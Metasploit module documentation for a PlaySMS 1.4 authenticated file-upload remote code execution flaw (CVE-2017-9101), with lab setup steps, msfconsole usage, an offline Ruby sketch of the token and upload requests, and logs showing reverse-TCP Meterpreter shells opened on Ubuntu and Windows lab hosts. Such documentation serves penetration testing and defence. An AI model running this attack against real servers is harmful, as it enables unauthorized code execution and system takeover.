metasploit-framework/documentation/modules/exploit/multi/http/playsms_uploadcsv_exec.md


Description

An authenticated attacker can upload a malicious file through import.php (the Phonebook import feature) in PlaySMS version 1.4 and thereby execute code on the server. Additional information, including other vulnerabilities in this release, can be found in Exploit-DB 42044 and CVE-2017-9101.

Vulnerable Application

PlaySMS 1.4 is available at Exploit-DB (download link in the setup steps below).

Vulnerable Application Installation Setup

  1. Download the application: wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
  2. Extract it: tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
  3. Move the web root into the web directory: mv playsms-1.4/web/* /var/www/html/
  4. Create the config file: cp /var/www/html/config-dist.php /var/www/html/config.php
  5. Change the owner: chown -R www-data:www-data /var/www/html/
  6. Set the database credentials in config.php, and import playsms-1.4/db/playsms.sql into your playsms database.
  7. Now visit http://localhost/

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/playsms_uploadcsv_exec
  4. Do: set rport <port>
  5. Do: set rhost <ip>
  6. Do: set targeturi <path> (the directory PlaySMS is served from, e.g. SecreTSMSgatwayLogin)
  7. Do: set username <valid PlaySMS user> (e.g. touhid)
  8. Do: set password <that user's password> (e.g. diana)
  9. Do: check
     [*] 10.22.1.10:80 The target appears to be vulnerable.
  10. Do: set lport <port>
  11. Do: set lhost <ip>
  12. Do: exploit
  13. You should get a shell.
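The module output in the Scenarios below shows the request sequence: fetch a page, read its anti-CSRF token, log in with that token, fetch the upload page, read its token, then post the CSV to the phonebook import. The following is an added example, not code from the Metasploit module or from PlaySMS: the two request-building pieces of that sequence (token extraction and form/multipart body construction) as plain Ruby that runs offline against a constructed sample page. The hidden-input name X-CSRF-Token matches the module's log output; the login route and field names, the upload field name fnpb, and the CSV column layout are assumptions for illustration only, and the file content used is an ordinary phonebook row rather than the module's payload.

```ruby
# Added example (not the Metasploit module's code and not PlaySMS code):
# the token-extraction and request-body steps behind the module log lines
# "X-CSRF-Token for login" / "X-CSRF-Token for upload". Only the hidden-input
# name X-CSRF-Token comes from the module log; everything else below
# (login route, username/password field names, upload field name 'fnpb',
# CSV columns) is an assumption for illustration.
require 'uri'
require 'securerandom'

# Constructed sample of a PlaySMS-style form page (not captured from a real
# install); only the hidden-input shape matters here.
SAMPLE_LOGIN_PAGE = <<~HTML
  <form method="post" action="index.php?app=main&inc=core_auth&route=login&op=login">
    <input type="hidden" name="X-CSRF-Token" value="c9ad6a45cd206228554b237985b344ef">
    <input type="text" name="username">
    <input type="password" name="password">
  </form>
HTML

# Return the value of the hidden X-CSRF-Token input, or nil if the page has
# none (the caller should then stop: no token means no PlaySMS form here).
# Attribute order inside the <input> tag is not assumed.
def extract_csrf_token(html)
  html.scan(/<input\b[^>]*>/i).each do |tag|
    next unless tag =~ /\bname=["']X-CSRF-Token["']/i
    value = tag[/\bvalue=["']([^"']*)["']/i, 1]
    return value unless value.nil? || value.empty?
  end
  nil
end

# application/x-www-form-urlencoded login body carrying the page token
# (field names username/password are assumed).
def login_form(token, username, password)
  URI.encode_www_form('X-CSRF-Token' => token,
                      'username' => username,
                      'password' => password)
end

# multipart/form-data body for the phonebook CSV import, carrying the upload
# page's own token. Returns [body, content_type]. The upload field name and
# the CSV layout are assumptions; the row is harmless sample data.
def csv_upload_body(token, csv, field_name: 'fnpb', filename: 'phonebook.csv')
  boundary = "----PlaySMSDemo#{SecureRandom.hex(8)}"
  body = +''
  body << "--#{boundary}\r\n"
  body << "Content-Disposition: form-data; name=\"X-CSRF-Token\"\r\n\r\n#{token}\r\n"
  body << "--#{boundary}\r\n"
  body << "Content-Disposition: form-data; name=\"#{field_name}\"; filename=\"#{filename}\"\r\n"
  body << "Content-Type: text/csv\r\n\r\n#{csv}\r\n"
  body << "--#{boundary}--\r\n"
  [body, "multipart/form-data; boundary=#{boundary}"]
end

if __FILE__ == $PROGRAM_NAME
  token = extract_csrf_token(SAMPLE_LOGIN_PAGE) or abort 'no X-CSRF-Token on page'
  puts login_form(token, 'touhid', 'diana')
  # Constructed CSV; column names are illustrative, not PlaySMS's schema.
  body, ctype = csv_upload_body(token, "Name,Mobile,Email\nAlice,123456789,alice@example.com\n")
  puts ctype
  puts body
end
```

Each token is tied to the page it was read from, which is why the module reads one token for the login POST and a second one for the upload POST rather than reusing the first.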

Scenarios

Playsms on Ubuntu Linux

msf > use exploit/multi/http/playsms_uploadcsv_exec                                             
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.7
rhost => 10.22.1.7
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi SecreTSMSgatwayLogin
targeturi => SecreTSMSgatwayLogin
msf exploit(multi/http/playsms_uploadcsv_exec) > check 
[*] 10.22.1.7:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username touhid
username => touhid
msf exploit(multi/http/playsms_uploadcsv_exec) > set password diana
password => diana
msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.22.1.3 
lhost => 10.22.1.3
msf exploit(multi/http/playsms_uploadcsv_exec) > run 

[*] Started reverse TCP handler on 10.22.1.3:4444 
[+] X-CSRF-Token for login : c9ad6a45cd206228554b237985b344ef
[*] Trying to Login ......
[+] Authentication successful: touhid:diana
[+] X-CSRF-Token for upload : 112cd5ecbdf12daf60391609d19ae3d6
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.7
[*] Meterpreter session 2 opened (10.22.1.3:4444 -> 10.22.1.7:56580) at 2018-03-25 17:42:43 +0530

meterpreter > sysinfo 
Computer    : Dina
OS          : Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/linux
meterpreter > 

Playsms on Windows 7

msf > use exploit/multi/http/playsms_uploadcsv_exec                                             
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.9
rhost => 10.22.1.9 
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi web
targeturi => web
msf exploit(multi/http/playsms_uploadcsv_exec) > check 
[*] 10.22.1.9:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username test
username => test
msf exploit(multi/http/playsms_uploadcsv_exec) > set password metasploit
password => metasploit
msf exploit(multi/http/playsms_uploadcsv_exec) > set verbose true
verbose => true
msf exploit(multi/http/playsms_uploadcsv_exec) > exploit 

[*] Started reverse TCP handler on 10.22.1.3:4444 
[+] X-CSRF-Token for login : cf467bf4829b355a5f4f2964e853ff2c
[*] Trying to Login ......
[+] Authentication successful: test:metasploit
[+] X-CSRF-Token for upload : 3aca00c2d6a5988ed74fa7d992e14904
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.9
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.9:50065) at 2018-03-25 17:27:57 +0530

meterpreter > sysinfo 
Computer    : TOUHID-PC
OS          : Windows NT TOUHID-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter >